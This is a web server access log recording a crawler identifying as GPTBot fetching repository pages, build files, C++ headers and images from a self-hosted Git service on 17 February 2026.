- GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 10306] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:17:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:17:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" +[17/Feb/2026:17:40:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:40:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:40:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:17:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:17:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:17:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 10456] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" +[17/Feb/2026:17:40:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:40:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:17:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:17:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14175] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec?display=source" [Client 74.7.227.38] [Length 12586] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:17:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor" [Client 74.7.227.38] [Length 86388] [Gzip 15.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" +[17/Feb/2026:17:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor" [Client 74.7.227.38] [Length 51935] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" +[17/Feb/2026:17:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14174] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14175] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11160] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10979] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10954] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 11076] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:17:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 11067] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:17:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:17:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:17:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] 